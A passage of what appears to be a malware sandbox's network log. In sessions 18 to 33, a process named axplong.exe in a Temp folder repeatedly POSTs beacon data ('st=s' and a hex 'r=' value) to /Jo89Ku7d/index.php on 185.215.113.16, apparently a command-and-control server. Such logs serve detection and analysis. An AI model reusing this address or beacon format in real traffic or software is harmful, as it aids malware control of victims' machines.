                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  18  192.168.2.5  49730  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:23.402973890 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:24.131936073 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:24.132808924 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:24.365736961 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  19  192.168.2.5  49731  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:24.480401039 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:25.188328981 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:25.189460039 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:25.411484957 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  20 | 192.168.2.5 | 49732 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:25.527410030 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:26.247225046 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:26.248262882 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:26.479299068 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  21 | 192.168.2.5 | 49733 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:26.589998007 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:27.286318064 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:27.287940025 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:27.512229919 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  22 | 192.168.2.5 | 49734 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:27.623887062 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:28.384051085 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:28.384829998 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:28.615612030 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  23 | 192.168.2.5 | 49735 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:28.730205059 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:29.421099901 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:29.421895981 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:29.645183086 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  24 | 192.168.2.5 | 49736 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:29.763433933 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:30.470469952 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:30.471194983 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:30.743355989 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  25 | 192.168.2.5 | 49737 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:30.855334997 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:31.571554899 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:31.572357893 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:31.796993971 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  26 | 192.168.2.5 | 49738 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:32.118624926 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:32.835402966 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:32.836201906 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:33.063921928 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  27 | 192.168.2.5 | 49739 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:33.183466911 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:33.871776104 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:33.880419016 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:34.102134943 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  28 | 192.168.2.5 | 49740 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:34.215152025 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:35.006129980 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:35.006886005 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:35.235718966 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  29 | 192.168.2.5 | 49741 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:35.355457067 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:36.056668043 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:36.057486057 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:36.279582024 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  30 | 192.168.2.5 | 49742 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:36.386394024 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:37.156671047 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:37.157522917 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:37.409873009 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  31 | 192.168.2.5 | 49743 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:37.527626991 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:38.222038984 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:38.223140001 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:38.445768118 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  32 | 192.168.2.5 | 49744 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:38.561274052 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:39.263372898 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:39.264466047 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:39.486574888 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  33 | 192.168.2.5 | 49745 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:39.606348991 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:40.306037903 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
